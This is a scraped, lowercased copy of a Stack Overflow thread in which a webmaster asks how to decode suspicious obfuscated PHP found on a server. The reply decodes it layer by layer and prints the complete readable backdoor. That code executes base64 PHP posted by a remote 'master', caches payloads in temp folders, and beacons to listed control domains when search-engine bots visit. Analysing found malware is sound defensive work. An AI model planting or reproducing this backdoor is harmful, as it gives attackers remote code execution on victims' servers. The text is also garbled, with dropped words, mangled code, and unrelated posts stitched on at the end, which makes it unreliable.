How to decrypt/decode this php code? (possible malicious code) -

-

hello there fellow stackoverflow members, first of hope having amazing day. going through files on web server, , noticed recent modification date few files, dont remember doing on dates. upon inspecting files, noticed of files had similar code. sadly seems obfuscated i'm assuming malicious, since did not place here.

well here's code, if provide insight, great!

http://pastebin.com/qd0bmbxm

reason im posting on pastebin because, putting code code tag, make huge endless line since unformated.

thanks advice.

all info reading in there, need unwrap bit bit, like:

pack('h*','6261736536'.'345f6465636f6465') => base64_decode()

base64_decode(substr($junk, 3442, 16)) => preg_replace() base64_decode(substr($junk, 773, 2664)) => 

eval(gzuncompress(base64_decode("ejyvv3tv2kgq/yobfew25pr84nmct6cuxjbygbnsquqrrwfjrbo7mubskmp3v5l9ejdgulvmj8lm7lznn0oyjsbziq6tjk6mxoqwtngk2almi4zpvph1lluwsz4rnrovab42zqpicslhihfno9eotv0skph97a1j3oiibjjlkzfjhhplsapmjsloussyoqsa6ruy9ejldzjs43yuuin3zjhzyandkdrrreucylabwb/qcspds0gb3qnmfebaetj2jeg6fumasd/jknhls0nxehbxhnmilratsaqteawrmumg2wycrs9kcuyokkkgjx7jy3izzyxnyq1s0wydaccknher4scekq10tscqd4aqbanvmbqabim6j1mu01/jfkyioe2egvqo8fcf1ccsidud1wwl5zcvwoaqwjs5r6zokdkegytc3u9vw8kshv8s8j9ddbeirmeevhwzhhwztq31ami/ktgdzu6n49l0ml67hgeiy47lx4xj8fbqnhv9nqzvzxzpstyblouk7kgj8h2qwu6knf6m+zzqvkwh3tyxr4z4dfvqalsshqqe0vxelzxlylkyhmjdgmbx23z5m3+mmwr+ltsjf0nzb/zenuyp5abxnzbpp8442r9qcgn9vgp9iya48edwrt5epd4vxhavaxpcs3izm01+c23ne/e9u8m35wcq4669i6khgshhdts5mcthndy/voodyip963b6nwrhnbbvt7t4nhieofnmfebltlk08pkechb2aofefca5ucdgb8qhnxt7d/bgzcrgjmpmas64xpebux8t6l0bfj8qtc/99zzmk2o0kh8tqrlkdhlcjjb+cozqojnn3tsmx2zi3zk6ygbuubslvw2hfj+nljzsbrmdpn4eqq0o4rzwsio4fsmskompalzyb6ujyajvh8cymat4qpoohzs+boshhyj310irf1iputryxtgilsp+viuh4mifujowb3cartdcl0+55nsp+to3bsgodvgvx7piplrz/hqssgei7jm+yanmlk81jetbog5bad7mgv4cxw4kudvh76gjc3rvmkgkxmlhhnzgqrjwwv2eus6zliitv7f8x1mshcbfehdkxzvzsmak74ztmj8h9d5jns5nucf+crfypggc70ectb4vptj1/syydkx1bnsotmvr5mn+qotai80wq3ls8nve0mxyczoqrjrzbimozpchkjk6cyqfczfzyasazccv2mfmyxoexpo58lgbqdyir3v1ipruf9p1dl4zz0dt3fxzsm35vj/oz8vjkn3rcjywtc6ftzf35pzf1nv6aylf8ndpntlis8nnhdlrimta52gvjwikgbl0f3+zaslnziuhsaxii0kqcwqrpvglrbya1i3j69htmi5n+8tocps2nh4da5pbdaaf2xcfukwk4vsoeqwf9yoi5ygttze6cstryu/52odzi8wotjfndsdfjzzb47qqulr1b6q2jew2kwsrwzuy5xgvtuvmswfcq+mh9vooql89q4mt4afrb/zectn0rbhjxdcdivtfeouwjci7qk0sv4a3myl+4kdk915yx/bi5mrl8gps/6ywwll5dg4dxnwxggfndfkbubp4actf4sh97kyxdwihrvicmz8j72ypjqouxcjyjftfstgm9rb8lor05u7bevufbwgngddp25qhfu5jag6b7ob0rrpvmmbmwnynfy9s+qy0nhauzdfya6a2zrvvmhcgg780+gugi8f/fkf2ma0y3y2f+ff242az7ly0zrmllusok29ejn8fdlmalfeiest+gwevzysv02dfbvpsfvfaxh5dsqrntgy9kdxkwncusk4ea66bflgf3awr4p4fwtu7/mv600jlncvuvp3s7xhyhazpi7huott8ugtb6ywe212hhdbpd+qth3uquiw3dhhuv03znqb3nfp5evmhjo/7uwf//wd+5i1x")));

=>

if (!defined("determinator")){ function determinator_feof($qq00q0, &$iiill1 = null) { $iiill1 = microtime(true); return feof($qq00q0); } function getfile($il1i1i, $q0ooqo){ $i11iil = qqqqo0oq(2, 6); $q0oqoq = $i11iil.qqqqo0oq(11, 7); @ini_set(qqqqo0oq(19, 20), 1); if (@ini_get(qqqqo0oq(19, 20)) == qqqqo0oq(41, 2)) { $q0qo0q=@file_get_contents(qqqqo0oq(46, 10) . $il1i1i . $q0ooqo. qqqqo0oq(59, 30)); return $q0qo0q; } elseif (function_exists($q0oqoq)){ $i1il1i = @$q0oqoq(); $i1illi = $i11iil.qqqqo0oq(90, 10); $q0qqqq = $i11iil.qqqqo0oq(101, 7); @$i1illi($i1il1i, curlopt_url, qqqqo0oq(46, 10) . $il1i1i . $q0ooqo. qqqqo0oq(111, 12)); @$i1illi($i1il1i, curlopt_header,false); @$i1illi($i1il1i, curlopt_returntransfer,true); @$i1illi($i1il1i, curlopt_connecttimeout, 5); $ii1i11 = @$q0qqqq($i1il1i); @curl_close($i1il1i); if (empty($ii1i11)){$ii1i11 = qqqqo0oq(126, 0);} return $ii1i11; } else { $qq00q0 = @fsockopen($il1i1i, 80, $il1i1l, $ill1i1, 5); if ($qq00q0) { $qqq0o0 = qqqqo0oq(126, 0); $iiill1 = null; @fputs($qq00q0, "get {$q0ooqo}&way=socket http/1.0\r\nhost: {$il1i1i}\r\n"); $q0q0qq = php_os.qqqqo0oq(130, 2).php_version; @fputs($qq00q0, "user-agent: {$q0q0qq}\r\n\r\n"); while(!determinator_feof($qq00q0, $iiill1) && (microtime(true) - $iiill1) < 2){ $qqq0o0 .= @fgets($qq00q0, 128); } @fclose($qq00q0); $q0oqo0 = explode("\r\n\r\n", $qqq0o0); unset($q0oqo0[0]); return implode("\r\n\r\n", $q0oqo0); } } } $iillil = array(qqqqo0oq(133, 10), qqqqo0oq(147, 19), qqqqo0oq(169, 15)); function write($il1lli,$ill1li){ if ($q0qooo=@fopen($il1lli,qqqqo0oq(185, 2))){ @fwrite($q0qooo,$ill1li); @fclose($q0qooo); } } function output($q00qq0, $qq00oq){ echo qqqqo0oq(191, 3).$q00qq0.qqqqo0oq(199, 2).$qq00oq."\r\n"; } @ini_set(qqqqo0oq(203, 19), 0); define(qqqqo0oq(225, 16), 1); $iilili=qqqqo0oq(241, 7); $qo0oo0=qqqqo0oq(249, 6); $q0qo0o=qqqqo0oq(255, 23); $qqo0qo=qqqqo0oq(281, 18); $iliil1=qqqqo0oq(302, 18); $il1i1i=qqqqo0oq(46, 10); if (isset($_server[qqqqo0oq(321, 7)])){ if (@$_server[qqqqo0oq(321, 7)] != qqqqo0oq(329, 4)){ $il1i1i=qqqqo0oq(334, 11); } } $il1i1i.=strtolower(@$_server[qqqqo0oq(345, 12)]); foreach ($_get $q00qq0=>$qq00oq){ if (strpos($qq00oq,qqqqo0oq(359, 7))){$_get[$q00qq0]=qqqqo0oq(126, 0);} elseif (strpos($qq00oq,qqqqo0oq(371, 8))){$_get[$q00qq0]=qqqqo0oq(126, 0);} } if(!isset($_server[qqqqo0oq(383, 15)])) { $_server[qqqqo0oq(383, 15)] = @$_server[qqqqo0oq(398, 15)]; if(@$_server[qqqqo0oq(415, 16)]) { $_server[qqqqo0oq(383, 15)] .= qqqqo0oq(434, 2) . @$_server[qqqqo0oq(415, 16)]; } } if ($qo0oqq=$il1i1i.@$_server[qqqqo0oq(383, 15)]){ $qoqoo0=@md5($il1i1i.$qo0oo0.php_os.$q0qo0o); $iil111=dirname(__file__).directory_separator; $qoo00o = array( qqqqo0oq(439, 11), qqqqo0oq(450, 20), qqqqo0oq(473, 19), @$_server[qqqqo0oq(493, 4)], @$_server[qqqqo0oq(497, 6)], @$_env[qqqqo0oq(493, 4)], @$_env[qqqqo0oq(503, 8)], @$_env[qqqqo0oq(497, 6)], qqqqo0oq(514, 6), @ini_get(qqqqo0oq(523, 19)), $iil111.qqqqo0oq(542, 4), $iil111.qqqqo0oq(549, 24), $iil111.qqqqo0oq(574, 22), ); foreach ($qoo00o $qqq0qq){ if (!empty($qqq0qq)){ $qqq0qq.=directory_separator; if (@is_writable($qqq0qq)){ $iil111 = $qqq0qq; break; } } } $tmp=$iil111.qqqqo0oq(597, 2).$qoqoo0; if (@$_server["http_y_auth"]==$qoqoo0 or @$_post["y_auth"]==$qoqoo0){ echo "\r\n"; @output(qqqqo0oq(599, 8), $qo0oo0.qqqqo0oq(609, 2).$iilili.qqqqo0oq(611, 6)); if ($illi11=$qqo0qo(@$_post[qqqqo0oq(617, 10)])){ @eval($illi11); echo "\r\n"; @output(qqqqo0oq(629, 4), qqqqo0oq(634, 3)); } exit(0); } if (@is_file($tmp)){ @touch($tmp); @include_once($tmp); } else{ $qo0oqq=@urlencode($qo0oqq); $i11ill = @strtolower(@$_server[qqqqo0oq(643, 20)]); foreach (explode(qqqqo0oq(665, 2), qqqqo0oq(669, 55)) $i1111l){ if (strpos($i11ill, $i1111l)!==false){ if (@touch($tmp)){ $q0ooqo = qqqqo0oq(727, 14).$qo0oqq.qqqqo0oq(742, 4).$qoqoo0.qqqqo0oq(749, 12).$iilili.qqqqo0oq(767, 4).$qo0oo0; $i1l1li = getfile($iillil[0], $q0ooqo); @touch($tmp); } break; } } } } } 

if(!defined("determinator")) {     function determinator_feof($qq00q0_feof_resource, &$iiill1_time_by_ref = null)     {         $iiill1_time_by_ref = microtime(true);         return feof($qq00q0_feof_resource);     }      function getfile($il1i1i_hostname, $q0ooqo_url_file)     {         $i11iil = "curl";         $q0oqoq = "curl_init";         @ini_set("allow_url_fopen", 1);         if (@ini_get("allow_url_fopen") == "1")         {             $remote_content=@file_get_contents("http://" . $il1i1i_hostname . $q0ooqo_url_file . "&way=file_get_contents");             return $remote_content;         }         elseif (function_exists("curl_init"))         {             $curl_handler = @curl_init();             $i1illi = "curl_setopt";             $q0qqqq = "curl_exec";             @curl_setopt($curl_handler, curlopt_url, "http://" . $il1i1i_hostname . $q0ooqo_url_file . "&way=curl");             @curl_setopt($curl_handler, curlopt_header,false);             @curl_setopt($curl_handler, curlopt_returntransfer,true);             @curl_setopt($curl_handler, curlopt_connecttimeout, 5);             $remote_content = @curl_exec($curl_handler);             @curl_close($curl_handler);             if (empty($remote_content))             {                 $remote_content = "";             }             return $remote_content;         }         else         {             $socket_resource = @fsockopen($il1i1i_hostname, 80, $il1i1l, $ill1i1, 5);             if ($socket_resource)             {                 $qqq0o0 = "";                 $iiill1 = null;                 @fputs($socket_resource, "get {$q0ooqo_url_file}&way=socket http/1.0\r\nhost: {$il1i1i_hostname}\r\n");                 $q0q0qq = php_os."/".php_version;                 @fputs($socket_resource, "user-agent: {$q0q0qq}\r\n\r\n");                 while(!determinator_feof($socket_resource, $iiill1) && (microtime(true) - $iiill1) < 2)                 {                     $qqq0o0 .= @fgets($socket_resource, 128);                 }                 @fclose($socket_resource);                 $q0oqo0 = explode("\r\n\r\n", $qqq0o0);                 unset($q0oqo0[0]);                 return implode("\r\n\r\n", $q0oqo0);             }         }     }      $iillil = array("oson.in", "ryanecasey.com", "phpaide.com");      function write($il1lli_local_file, $ill1li_data_to_write)     {         if ($q0qooo_local_file_handler=@fopen($il1lli_local_file, "w"))         {             @fwrite($q0qooo_local_file_handler, $ill1li_data_to_write);             @fclose($q0qooo_local_file_handler);         }     }      function output($q00qq0, $qq00oq)     {         echo "y_".$q00qq0.":".$qq00oq."\r\n";     }      @ini_set("display_errors", 0);     define("determinator", 1);     $iilili="ftp13";     $qo0oo0="2.20";     $q0qo0o="iiiiiliil1111l1il";     $qqo0qo="base64_decode";     $iliil1="base64_encode";     $il1i1i_url_domain_and_protocol="http://";      if(isset($_server["https"]))     {         if(@$_server["https"] != "off")         {             $il1i1i_url_domain_and_protocol="https://";         }     }      $il1i1i_url_domain_and_protocol.=strtolower(@$_server["http_host"]);      foreach ($_get $q00qq0_get_key=>$qq00oq_get_value)     {         if(strpos($qq00oq_get_value, "union"))         {             $_get[$q00qq0_get_key]="";         }         elseif (strpos($qq00oq_get_value, "select"))         {             $_get[$q00qq0_get_key]="";         }     }     if(!isset($_server["request_uri"]))     {         $_server["request_uri"] = @$_server["script_name"];         if(@$_server["query_string"])         {             $_server["request_uri"] .= "?" . @$_server["query_string"];         }     }     if ($qo0oqq_url=$il1i1i_url_domain_and_protocol.@$_server["request_uri"])     {         $qoqoo0_temp_file_name=@md5($il1i1i_url_domain_and_protocol."2.20".php_os."iiiiiliil1111l1il");         $iil111_curent_dir=dirname(__file__).directory_separator;         $qoo00o_temp_dir_list = array(             "/dev/shm",             "/tmp/.font-unix",             "/tmp/.ice-unix",             @$_server["tmp"],             @$_server["temp"],             @$_env["tmp"],             @$_env["tmpdir"],             @$_env["temp"],             "/tmp",             @ini_get("upload_tmp_dir"),             $iil111_curent_dir."tmp",             $iil111_curent_dir."wp-content/uploads",             $iil111_curent_dir."wp-content/cache",             );         foreach ($qoo00o_temp_dir_list $qqq0qq_current_temp_dir)         {             if (!empty($qqq0qq_current_temp_dir))             {                 $qqq0qq_current_temp_dir.=directory_separator;                 if (@is_writable($qqq0qq_current_temp_dir))                 {                     $iil111_curent_dir = $qqq0qq_current_temp_dir;                     break;                 }             }         }          $tmp=$iil111_curent_dir . "." . $qoqoo0_temp_file_name;          if(@$_server["http_y_auth"]==$qoqoo0_temp_file_name or @$_post["y_auth"]==$qoqoo0_temp_file_name)         {             echo "\r\n";             @output("versio", "2.20" . "-" . "ftp13" . "-php");             if ($illi11_remote_php_code=base64_decode(@$_post["execphp"]))             {                 @eval($illi11_remote_php_code);                 echo "\r\n";                 @output("out", "ok");             }             exit(0);         }         if (@is_file($tmp))         {             @touch($tmp);             @include_once($tmp);         }         else         {             $qo0oqq_url=@urlencode($qo0oqq_url);             $i11ill = @strtolower(@$_server["http_user_agent"]);             foreach (explode(",", "google,yahoo,bing,msnbot,ask,baidu,yandex") $i1111l)             {                 if (strpos($i11ill, $i1111l)!==false)                 {                     if (@touch($tmp))                     {                         $q0ooqo_url2 = "/pg.php?u=" . $qo0oqq_url . "&k=" . $qoqoo0_temp_file_name . "&t=php&p=" . "ftp13" . "&v=" . "2.20";                         $i1l1li = getfile("oson.in", $q0ooqo_url2);                         @touch($tmp);                     }                     break;                 }             }         }     } }

it's interface / backdoor, loging data external server, , allowing "master" send php-code , have executed on server.

it's saves more php in tempfiles, can in 1 of 13 tempfolders tries write to.


Comments

Post a Comment

Popular posts from this blog

ios - UICollectionView Self Sizing Cells with Auto Layout -

-
Image
i'm trying self sizing uicollectionviewcells working auto layout, can't seem cells size content. i'm having trouble understanding how cell's size updated contents of what's inside cell's contentview. here's setup i've tried: custom uicollectionviewcell uitextview in contentview. scrolling uitextview disabled. the contentview's horizontal constraint is: "h:|[_textview(320)]", i.e. uitextview pinned left of cell explicit width of 320. the contentview's vertical constraint is: "v:|-0-[_textview]", i.e. uitextview pinned top of cell. the uitextview has height constraint set constant uitextview reports fit text. here's looks cell background set red, , uitextview background set blue: i put project i've been playing on github here . updated ios 9 after seeing github solution break under ios 9 got time investigate issue fully. have updated repo include several examples of different configurations s
Read more

node.js - ldapjs - write after end error -

-
i have created authentication service using following code in node.js , ldapjs. var when = require ('when'); var authenticationerror = require('../errors/authenticationerror'); var sessionmanagerservice = require('./sessionmanagerservice'); var ldap = require('ldapjs'); var client = ldap.createclient({ url: 'ldaps://ad.mycompany.com:636', tlsoptions: {'rejectunauthorized': false} }); module.exports = { signin: function (email, password) { return this.ldapbind(email, password).then( function () { return sessionmanagerservice.createsessionhash({email: email}); } ); }, ldapbind: function (email, password) { var deferred = when.defer(); client.bind(email, password, function(err) { if (err) { deferred.reject (new authenticationerror('invalid username and/or password!', 'authentication.signin.error')
Read more

DOM Manipulation in Wordpress (and elsewhere) using php -

-
DOM Manipulation in Wordpress (and elsewhere) using php - i'm quite new dom manipulation world , head start in order avoid mutual errors. i looking efficient way manipulate content generated wordpress using php. @ moment using simple html dom seems work fine. found domdocument , few others , helpfull if cleared out 1 faster, improve or @ to the lowest degree generate less errors in case of bad markup. also on side can explain syntax (instead of $html @$html) thank much php wordpress domdocument simple-html-dom
Read more